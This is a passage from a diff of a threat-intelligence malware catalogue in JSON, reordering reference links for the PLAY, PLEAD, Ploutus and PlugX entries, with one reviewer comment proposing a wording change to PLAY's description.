+ "description": "According to PCrisk, PLAY is the name of a ransomware-type program. Malware categorized as such operates by encrypting data and demanding ransoms for the decryption.\r\n\r\nAfter we executed a sample of this ransomware on our test machine, it encrypted files and appended their filenames with a \".PLAY\" extension. For example, a file titled \"1.jpg\" appeared as \"1.jpg.PLAY\", \"2.png\" as \"2.png.PLAY\", etc. Once the encryption process was completed, PLAY created a text file named \"ReadMe.txt\" on the desktop.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.play",
- "https://www.orangecyberdefense.com/global/blog/playing-the-game",
- "https://chuongdong.com/reverse%20engineering/2022/09/03/PLAYRansomware/",
- "https://www.bleepingcomputer.com/news/security/rackspace-confirms-play-ransomware-was-behind-recent-cyberattack/",
- "https://www.fortinet.com/blog/threat-research/ransomware-roundup-play-ransomware",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-007.pdf",
 "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/play-ransomware-volume-shadow-copy",
 "https://www.sentinelone.com/labs/crimeware-trends-ransomware-developers-turn-to-intermittent-encryption-to-evade-detection/",
- "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf",
- "https://www.avertium.com/resources/threat-reports/an-in-depth-look-at-play-ransomware",
- "https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/",
 "https://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html",
- "https://medium.com/walmartglobaltech/from-royal-with-love-88fa05ff7f65"
+ "https://medium.com/walmartglobaltech/from-royal-with-love-88fa05ff7f65",
+ 
"https://www.avertium.com/resources/threat-reports/an-in-depth-look-at-play-ransomware",
+ "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf",
+ "https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/",
+ "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-play",
+ "https://www.orangecyberdefense.com/global/blog/playing-the-game",
+ "https://chuongdong.com/reverse%20engineering/2022/09/03/PLAYRansomware/",
+ "https://www.fortinet.com/blog/threat-research/ransomware-roundup-play-ransomware",
+ "https://www.bleepingcomputer.com/news/security/rackspace-confirms-play-ransomware-was-behind-recent-cyberattack/"
 ],
 "synonyms": [
 "PlayCrypt"
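Review bot: The PLAY description carries PCrisk's first-person lab narrative — `After we executed a sample of this ransomware on our test machine, it encrypted files and appended their filenames with a \".PLAY\" extension.` — which reads as if the galaxy maintainers ran the sample. Since the entry already opens with `According to PCrisk,`, rewording the second paragraph to third person, e.g. `In PCrisk's analysis the sample encrypted files and appended a \".PLAY\" extension to their names.`, keeps the attribution unambiguous, and the embedded `\r\n\r\n` between the paragraphs could become a single space at the same time. The remaining detail (the `1.jpg.PLAY` example and the `ReadMe.txt` note name) is useful triage information and worth keeping as is.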
@@ -37799,29 +39591,29 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.plead",
- "https://www.welivesecurity.com/2019/05/14/plead-malware-mitm-asus-webstorage/",
- "https://www.welivesecurity.com/2018/07/09/certificates-stolen-taiwanese-tech-companies-plead-malware-campaign/",
- "https://www.cyberandramen.net/home/blacktech-doesnt-miss-a-step-a-quick-analysis-of-a-busy-2020",
- "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947724.pdf",
- "https://blogs.jpcert.or.jp/en/2018/11/tscookie2.html",
- "https://blogs.jpcert.or.jp/en/2019/09/tscookie-loader.html",
- "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
- "http://blog.jpcert.or.jp/2018/03/malware-tscooki-7aa0.html",
- "https://www.fireeye.com/blog/threat-research/2016/04/ghosts_in_the_endpoi.html",
 "https://blog.jpcert.or.jp/2018/06/plead-downloader-used-by-blacktech.html",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/kivars-with-venom-targeted-attacks-upgrade-with-64-bit-support/",
+ "https://blogs.jpcert.or.jp/en/2018/11/tscookie2.html",
+ "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947724.pdf",
+ "http://blog.jpcert.or.jp/2018/03/malware-tscooki-7aa0.html",
 "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/palmerworm-blacktech-espionage-apt",
- "https://web.archive.org/web/20200229012206/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947724.pdf",
- "https://www.trendmicro.com/en_us/research/17/f/following-trail-blacktech-cyber-espionage-campaigns.html",
- "https://securelist.com/apt-trends-report-q2-2019/91897/",
 "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_2_ycy-aragorn_en.pdf",
- "https://www.macnica.net/file/mpressioncss_ta_report_2019_2_nopw.pdf",
+ 
"https://www.cyberandramen.net/home/blacktech-doesnt-miss-a-step-a-quick-analysis-of-a-busy-2020",
+ "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
+ "https://blogs.jpcert.or.jp/en/2019/05/tscookie3.html",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/kivars-with-venom-targeted-attacks-upgrade-with-64-bit-support/",
+ "https://www.fireeye.com/blog/threat-research/2016/04/ghosts_in_the_endpoi.html",
 "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape",
 "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf",
- "https://blogs.jpcert.or.jp/en/2019/05/tscookie3.html",
- "http://www.freebuf.com/column/159865.html",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/",
+ "https://securelist.com/apt-trends-report-q2-2019/91897/",
+ "https://www.welivesecurity.com/2018/07/09/certificates-stolen-taiwanese-tech-companies-plead-malware-campaign/",
+ "https://web.archive.org/web/20200229012206/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947724.pdf",
+ "https://www.trendmicro.com/en_us/research/17/f/following-trail-blacktech-cyber-espionage-campaigns.html",
 "https://documents.trendmicro.com/assets/appendix-following-the-trail-of-blacktechs-cyber-espionage-campaigns.pdf",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/"
+ "https://www.macnica.net/file/mpressioncss_ta_report_2019_2_nopw.pdf",
+ "https://www.welivesecurity.com/2019/05/14/plead-malware-mitm-asus-webstorage/",
+ "https://blogs.jpcert.or.jp/en/2019/09/tscookie-loader.html",
+ "http://www.freebuf.com/column/159865.html"
 ],
 "synonyms": [
 "DRAWDOWN",
@@ -37838,13 +39630,13 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.ploutus_atm",
+ "http://antonioparata.blogspot.co.uk/2018/02/analyzing-nasty-net-protection-of.html",
 "https://documents.trendmicro.com/assets/white_papers/wp-cashing-in-on-atm-malware.pdf",
 "https://www.fireeye.com/blog/threat-research/2017/01/new_ploutus_variant.html",
- "http://antonioparata.blogspot.co.uk/2018/02/analyzing-nasty-net-protection-of.html",
 "https://www.metabaseq.com/recursos/ploutus-is-back-targeting-itautec-atms-in-latin-america",
+ "https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html",
 "https://www.crowdstrike.com/blog/ploutus-atm-malware-deobfuscation-case-study",
- "https://www.advintel.io/post/economic-growth-digital-inclusion-specialized-crime-financial-cyber-fraud-in-latam",
- "https://blog.talosintelligence.com/2019/05/10-years-of-virtual-dynamite.html"
+ "https://www.advintel.io/post/economic-growth-digital-inclusion-specialized-crime-financial-cyber-fraud-in-latam"
 ],
 "synonyms": [],
 "type": []
@@ -37871,175 +39663,184 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.plugx", - "https://asec.ahnlab.com/en/49097/", - "https://threatconnect.com/blog/research-roundup-activity-on-previously-identified-apt33-domains/", + "https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-annex-download.pdf", "https://blog.eclecticiq.com/mustang-panda-apt-group-uses-european-commission-themed-lure-to-deliver-plugx-malware", - "https://lab52.io/blog/mustang-panda-recent-activity-dll-sideloading-trojans-with-temporal-c2-servers/", - "https://www.computerweekly.com/news/252471769/New-threat-group-behind-Airbus-cyber-attacks-claim-researchers", - "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://web.archive.org/web/20200424035112/https://go.contextis.com/rs/140-OCV-459/images/White%20Paper_PlugX%20-%20Payload%20Extraction.pdf", + "https://www.trendmicro.com/en_us/research/23/b/investigating-the-plugx-trojan-disguised-as-a-legitimate-windows.html", + "https://cyberandramen.net/2022/01/06/a-gulp-of-plugx/", + "https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://community.rsa.com/thread/185439", + "https://researchcenter.paloaltonetworks.com/2017/06/unit42-paranoid-plugx/", + "https://www.rsa.com/content/dam/pdfs/2-2017/kingslayer-a-supply-chain-attack.pdf", + "https://www.youtube.com/watch?v=6SDdUVejR2w", + "https://www.proofpoint.com/us/blog/threat-insight/good-bad-and-web-bug-ta416-increases-operational-tempo-against-european", + "https://www.contextis.com/en/blog/avivore", + "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/carderbee-software-supply-chain-certificate-abuse", + 
"https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf", + "https://unit42.paloaltonetworks.com/thor-plugx-variant/", + "https://securelist.com/time-of-death-connected-medicine/84315/", + "https://or10nlabs.tech/reverse-engineering-the-new-mustang-panda-plugx-downloader/", + "https://www.recordedfuture.com/china-linked-ta428-threat-group", + "https://www.zdnet.com/article/chinese-state-hackers-target-hong-kong-catholic-church/", + "https://web.archive.org/web/20210925164035/https://blog.trendmicro.com/trendlabs-security-intelligence/bkdr_rarstone-new-rat-to-watch-out-for/", + "https://securelist.com/apt-trends-report-q3-2020/99204/", + "https://twitter.com/stvemillertime/status/1261263000960450562", + "https://therecord.media/indonesian-intelligence-agency-compromised-in-suspected-chinese-hack/", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/", + "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/operation-harvest-a-deep-dive-into-a-long-term-campaign/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lancefly-merdoor-zxshell-custom-backdoor", + "https://www.secureworks.com/blog/bronze-president-targets-russian-speakers-with-updated-plugx", + "https://unit42.paloaltonetworks.com/pkplug_chinese_cyber_espionage_group_attacking_asia/", + "https://go.recordedfuture.com/hubfs/reports/cta-2020-0728.pdf", + "https://www.sophos.com/en-us/medialibrary/pdfs/technical%20papers/plugx-thenextgeneration.pdf", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/space-pirates-tools-and-connections/", + "http://blog.jpcert.or.jp/2015/01/analysis-of-a-r-ff05.html", + "https://raw.githubusercontent.com/m4now4r/Presentations/main/MustangPanda%20-%20Enemy%20at%20the%20gate_final.pdf", + "https://news.sophos.com/en-us/2023/03/09/border-hopping-plugx-usb-worm/", + 
"https://www.cybereason.com/blog/threat-analysis-report-plugx-rat-loader-evolution", + "https://blogs.jpcert.or.jp/ja/2022/05/HUILoader.html", + "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Tseng-Mem2Img-Memory-Resident-Malware-Detection-via-Convolution-Neural-Network.pdf", + "https://www.darkreading.com/threat-intelligence/chinese-apt-bronze-president-spy-campaign-russian-military", + "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/plugx-a-talisman-to-behold.html", + "https://www.mandiant.com/resources/blog/infected-usb-steal-secrets", + "http://blog.jpcert.or.jp/.s/2017/04/redleaves---malware-based-on-open-source-rat.html", + "https://www.bleepingcomputer.com/news/security/chinas-apt-hackers-move-to-ransomware-attacks/", + "https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "https://www.recordedfuture.com/chinese-group-calypso-exploiting-microsoft-exchange/", + "https://www.secureworks.com/research/threat-profiles/bronze-firestone", "https://www.secureworks.com/research/threat-profiles/bronze-union", "https://www.contextis.com/de/blog/avivore", - "https://go.recordedfuture.com/hubfs/reports/cta-2020-0728.pdf", - "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/plugx-a-talisman-to-behold.html", - "https://news.sophos.com/en-us/2020/11/04/a-new-apt-uses-dll-side-loads-to-killlsomeone/", - "https://www.trendmicro.com/en_us/research/22/d/new-apt-group-earth-berberoka-targets-gambling-websites-with-old.html", - "https://kienmanowar.wordpress.com/2023/01/09/quicknote-another-nice-plugx-sample/", - "https://risky.biz/whatiswinnti/", - "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", - "https://conference.hitb.org/hitbsecconf2021sin/materials/D1T1%20-%20%20ShadowPad%20-%20A%20Masterpiece%20of%20Privately%20Sold%20Malware%20in%20Chinese%20Espionage%20-%20Yi-Jhen%20Hsieh%20&%20Joey%20Chen.pdf", - 
"https://blog.xorhex.com/blog/mustangpandaplugx-1/", - "https://www.youtube.com/watch?v=E2_DTQJjDYc", - "https://securelist.com/cycldek-bridging-the-air-gap/97157/", - "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023", - "https://insights.oem.avira.com/new-wave-of-plugx-targets-hong-kong/", - "https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-blackmatter-lockbit-thor", - "https://www.recordedfuture.com/redecho-targeting-indian-power-sector/", - "https://www.proofpoint.com/us/blog/threat-insight/ta416-goes-ground-and-returns-golang-plugx-malware-loader", - "https://www.sentinelone.com/labs/moshen-dragons-triad-and-error-approach-abusing-security-software-to-sideload-plugx-and-shadowpad/", - "https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-annex-download.pdf", - "http://blog.jpcert.or.jp/2015/01/analysis-of-a-r-ff05.html", - "https://st.drweb.com/static/new-www/news/2020/july/Study_of_the_APT_attacks_on_state_institutions_in_Kazakhstan_and_Kyrgyzstan_en.pdf", - "https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf", - "https://www.rsa.com/content/dam/pdfs/2-2017/kingslayer-a-supply-chain-attack.pdf", - "https://www.secureworks.com/research/threat-profiles/bronze-express", - "https://www.secureworks.com/research/threat-profiles/bronze-riverside", - "https://kienmanowar.wordpress.com/2022/12/27/diving-into-a-plugx-sample-of-mustang-panda-group/", - "https://engineers.ffri.jp/entry/2022/11/30/141346", - "https://www.trendmicro.com/en_us/research/20/k/weaponizing-open-source-software-for-targeted-attacks.html", - "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/operation-harvest-a-deep-dive-into-a-long-term-campaign/", - "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", - "https://silascutler.blogspot.com/2019/11/fresh-plugx-october-2019.html", - 
"https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/", - "https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/", - "https://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdf", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://blogs.blackberry.com/en/2022/10/mustang-panda-abuses-legitimate-apps-to-target-myanmar-based-victims", - "https://www.lac.co.jp/lacwatch/people/20171218_001445.html", - "https://blog.xorhex.com/blog/reddeltaplugxchangeup/", - "https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf", - "https://www.macnica.net/file/security_report_20160613.pdf", "https://documents.trendmicro.com/assets/txt/earth-berberoka-windows-iocs-2.txt", - "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", - "https://or10nlabs.tech/reverse-engineering-the-mustang-panda-plugx-rat-extracting-the-config/", - "https://raw.githubusercontent.com/m4now4r/Presentations/main/MustangPanda%20-%20Enemy%20at%20the%20gate_final.pdf", - "https://blog.vincss.net/2020/03/re012-phan-tich-ma-doc-loi-dung-dich-COVID-19-de-phat-tan-gia-mao-chi-thi-cua-thu-tuong-Nguyen-Xuan-Phuc-phan2.html", - "https://www.contextis.com/en/blog/avivore", - "https://blogs.jpcert.or.jp/en/2017/04/redleaves---malware-based-on-open-source-rat.html", - "https://www.nortonlifelock.com/sites/default/files/2021-10/OPERATION%20EXORCIST%20White%20Paper.pdf", - "https://www.trendmicro.com/en_us/research/23/b/investigating-the-plugx-trojan-disguised-as-a-legitimate-windows.html", - "https://unit42.paloaltonetworks.com/atoms/shallowtaurus/", - "https://redalert.nshc.net/2022/04/14/hacking-activity-of-sectorb-group-in-2021/", - 
"https://www.proofpoint.com/us/blog/threat-insight/good-bad-and-web-bug-ta416-increases-operational-tempo-against-european", - "http://www.talent-jump.com/article/2020/02/17/CLAMBLING-A-New-Backdoor-Base-On-Dropbox-en/", - "https://www.cybereason.com/blog/threat-analysis-report-plugx-rat-loader-evolution", - "https://researchcenter.paloaltonetworks.com/2017/06/unit42-paranoid-plugx/", - "https://www.youtube.com/watch?v=IRh6R8o1Q7U", - "https://cyberandramen.net/2022/01/06/a-gulp-of-plugx/", - "https://unit42.paloaltonetworks.com/plugx-variants-in-usbs/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments", - "https://therecord.media/redecho-group-parks-domains-after-public-exposure/", - "https://www.uscc.gov/sites/default/files/2022-02/Adam_Kozy_Testimony.pdf", - "https://www.zdnet.com/article/chinese-state-hackers-target-hong-kong-catholic-church/", - "https://blog.malwarebytes.com/threat-analysis/2016/08/unpacking-the-spyware-disguised-as-antivirus/", - "http://blog.jpcert.or.jp/.s/2017/04/redleaves---malware-based-on-open-source-rat.html", - "https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-pulling-pkplug-adversary-playbook-long-standing-espionage-activity-chinese-nation-state-adversary/", - "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Tseng-Mem2Img-Memory-Resident-Malware-Detection-via-Convolution-Neural-Network.pdf", - "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage", - "https://www.recordedfuture.com/chinese-group-calypso-exploiting-microsoft-exchange/", - "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/", - "https://countuponsecurity.com/2018/05/09/malware-analysis-plugx-part-2/", - "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape", - 
"https://blog.viettelcybersecurity.com/p1-chien-dich-cua-nhom-apt-trung-quoc-goblin-panda-tan-cong-vao-viet-nam-loi-dung-dai-dich-covid-19/", - "https://go.recordedfuture.com/hubfs/reports/cta-2020-0915.pdf", - "https://securelist.com/time-of-death-connected-medicine/84315/", - "https://tracker.h3x.eu/info/290", - "https://countuponsecurity.com/2018/02/04/malware-analysis-plugx/", - "https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/", - "https://threatpost.com/chinese-apt-combines-fresh-hodur-rat-with-complex-anti-detection/179084/", - "https://news.sophos.com/en-us/2023/03/09/border-hopping-plugx-usb-worm/", - "https://www.virusbulletin.com/virusbulletin/2020/05/vb2019-paper-apt-cases-exploiting-vulnerabilities-regionspecific-software/", - "https://attack.mitre.org/groups/G0096", - "https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/", - "http://blog.airbuscybersecurity.com/post/2014/01/plugx-some-uncovered-points.html", - "http://blog.jpcert.or.jp/2017/02/plugx-poison-iv-919a.html", - "https://www.bleepingcomputer.com/news/security/chinas-apt-hackers-move-to-ransomware-attacks/", - "https://speakerdeck.com/ashley920/into-the-fog-the-return-of-icefog-apt", - "https://www.youtube.com/watch?v=C_TmANnbS2k", - "https://www.secureworks.com/research/bronze-president-targets-ngos", - "https://community.rsa.com/thread/185439", - "https://www.recordedfuture.com/chinese-apt-groups-target-afghan-telecommunications-firm/", - "https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf", - "https://www.welivesecurity.com/2022/03/23/mustang-panda-hodur-old-tricks-new-korplug-variant/", - "https://lab52.io/blog/new-mustang-pandas-campaing-against-australia/", - "https://blogs.jpcert.or.jp/ja/2022/05/HUILoader.html", - "https://jsac.jpcert.or.jp/archive/2023/pdf/JSAC2023_2_LT4.pdf", - "https://www.fortinet.com/blog/threat-research/uncovering-new-activity-by-apt-", - 
"https://web.archive.org/web/20191214125833/https://contextis.com/media/downloads/AVIVORE_An_overview.pdf", - "https://secjoes-reports.s3.eu-central-1.amazonaws.com/Dissecting+PlugX+to+Extract+Its+Crown+Jewels.pdf", - "https://www.secureworks.com/research/threat-profiles/bronze-olive", - "https://app.box.com/s/z1uanuv1vn3vw5iket1r6bqrmlra0gpn", - "https://www.secureworks.com/research/threat-profiles/bronze-atlas", - "https://www.contextis.com/en/blog/dll-search-order-hijacking", - "https://www.youtube.com/watch?v=6SDdUVejR2w", - "https://unit42.paloaltonetworks.com/unsigned-dlls/", - "https://www.bleepingcomputer.com/news/security/new-mustang-panda-hacking-campaign-targets-diplomats-isps/", - "https://www.secureworks.com/blog/bronze-president-targets-russian-speakers-with-updated-plugx", - "https://web.archive.org/web/20210925164035/https://blog.trendmicro.com/trendlabs-security-intelligence/bkdr_rarstone-new-rat-to-watch-out-for/", - "https://unit42.paloaltonetworks.com/pkplug_chinese_cyber_espionage_group_attacking_asia/", - "https://ics-cert.kaspersky.com/publications/reports/2022/06/27/attacks-on-industrial-control-systems-using-shadowpad/", - "https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-berberoka.pdf", - "https://blog.ensilo.com/uncovering-new-activity-by-apt10", - "https://maxkersten.nl/binary-analysis-course/analysis-scripts/ghidra-script-to-handle-stack-strings/", - "https://www.welivesecurity.com/fr/2022/03/25/mustang-pandas-hodur-nouveau-korplug/", - "https://blog.vincss.net/2022/05/re027-china-based-apt-mustang-panda-might-have-still-continued-their-attack-activities-against-organizations-in-Vietnam.html", - "https://blog.xorhex.com/blog/mustangpandaplugx-2/", - "https://blog.talosintelligence.com/2022/05/mustang-panda-targets-europe.html", - "https://go.contextis.com/rs/140-OCV-459/images/White%20Paper_PlugX%20-%20Payload%20Extraction.pdf", - "https://unit42.paloaltonetworks.com/thor-plugx-variant/", - 
"https://www.cyber.gov.au/sites/default/files/2019-03/msp_investigation_report.pdf", - "https://www.fireeye.com/blog/threat-research/2014/06/clandestine-fox-part-deux.html", - "https://web.archive.org/web/20200424035112/https://go.contextis.com/rs/140-OCV-459/images/White%20Paper_PlugX%20-%20Payload%20Extraction.pdf", - "https://www.recordedfuture.com/china-linked-ta428-threat-group", - "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/space-pirates-tools-and-connections/", - "https://www.youtube.com/watch?v=qEwBGGgWgOM", - "https://st.drweb.com/static/new-www/news/2020/october/Study_of_the_ShadowPad_APT_backdoor_and_its_relation_to_PlugX_en.pdf", - "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/witchetty-steganography-espionage", - "https://www.darkreading.com/threat-intelligence/chinese-apt-bronze-president-spy-campaign-russian-military", - "https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia", - "https://threatrecon.nshc.net/2019/03/19/sectorm04-targeting-singapore-custom-malware-analysis/", - "https://or10nlabs.tech/reverse-engineering-the-new-mustang-panda-plugx-downloader/", - "https://www.secureworks.com/research/threat-profiles/bronze-woodland", - "https://www.sophos.com/en-us/medialibrary/pdfs/technical%20papers/plugx-thenextgeneration.pdf", - "https://www.secureworks.com/research/threat-profiles/bronze-firestone", - "https://www.us-cert.gov/ncas/alerts/TA17-117A", - "https://twitter.com/xorhex/status/1399906601562165249?s=20", - "https://www.secureworks.com/research/bronze-starlight-ransomware-operations-use-hui-loader", - "https://marcoramilli.com/2020/03/19/is-apt27-abusing-covid-19-to-attack-people/", - 
"https://www.secureworks.com/research/threat-profiles/bronze-overbrook", - "https://or10nlabs.tech/reverse-engineering-the-mustang-panda-plugx-loader", - "https://twitter.com/stvemillertime/status/1261263000960450562", - "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/", - "https://www.trendmicro.com/en_us/research/21/a/xdr-investigation-uncovers-plugx-unique-technique-in-apt-attack.html", - "https://www.youtube.com/watch?v=r1zAVX_HnJg", - "https://www.secureworks.com/blog/bronze-president-targets-government-officials", - "https://go.recordedfuture.com/hubfs/reports/cta-2021-0616.pdf", - "https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf", - "https://attack.mitre.org/groups/G0001/", - "https://therecord.media/indonesian-intelligence-agency-compromised-in-suspected-chinese-hack/", - "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", "https://www.secureworks.com/research/threat-profiles/bronze-keystone", + "https://www.fortinet.com/blog/threat-research/uncovering-new-activity-by-apt-", + "https://www.nortonlifelock.com/sites/default/files/2021-10/OPERATION%20EXORCIST%20White%20Paper.pdf", + "https://www.secureworks.com/research/threat-profiles/bronze-riverside", + "https://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdf", + "https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia", + "https://lab52.io/blog/mustang-panda-recent-activity-dll-sideloading-trojans-with-temporal-c2-servers/", + "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia", + "https://unit42.paloaltonetworks.com/unsigned-dlls/", + "https://blogs.blackberry.com/en/2022/10/mustang-panda-abuses-legitimate-apps-to-target-myanmar-based-victims", 
"https://blogs.blackberry.com/en/2022/12/mustang-panda-uses-the-russian-ukrainian-war-to-attack-europe-and-asia-pacific-targets", - "https://www.nttsecurity.com/docs/librariesprovider3/default-document-library/craftypanda-analysis-report", + "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023", + "https://www.bleepingcomputer.com/news/security/new-mustang-panda-hacking-campaign-targets-diplomats-isps/", + "https://www.computerweekly.com/news/252471769/New-threat-group-behind-Airbus-cyber-attacks-claim-researchers", + "https://www.proofpoint.com/us/blog/threat-insight/ta416-goes-ground-and-returns-golang-plugx-malware-loader", + "https://kienmanowar.wordpress.com/2022/12/27/diving-into-a-plugx-sample-of-mustang-panda-group/", + "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop", + "https://insights.oem.avira.com/new-wave-of-plugx-targets-hong-kong/", + "https://blog.viettelcybersecurity.com/p1-chien-dich-cua-nhom-apt-trung-quoc-goblin-panda-tan-cong-vao-viet-nam-loi-dung-dai-dich-covid-19/", + "https://blog.xorhex.com/blog/mustangpandaplugx-2/", + "https://blog.xorhex.com/blog/mustangpandaplugx-1/", + "https://go.recordedfuture.com/hubfs/reports/cta-2023-0330.pdf", + "https://ics-cert.kaspersky.com/publications/reports/2022/06/27/attacks-on-industrial-control-systems-using-shadowpad/", + "https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-blackmatter-lockbit-thor", + "https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf", + "https://secjoes-reports.s3.eu-central-1.amazonaws.com/Dissecting+PlugX+to+Extract+Its+Crown+Jewels.pdf", + "https://unit42.paloaltonetworks.com/atoms/shallowtaurus/", + "https://jsac.jpcert.or.jp/archive/2023/pdf/JSAC2023_2_LT4.pdf", + "https://blog.xorhex.com/blog/reddeltaplugxchangeup/", + "https://www.uscc.gov/sites/default/files/2022-02/Adam_Kozy_Testimony.pdf", + 
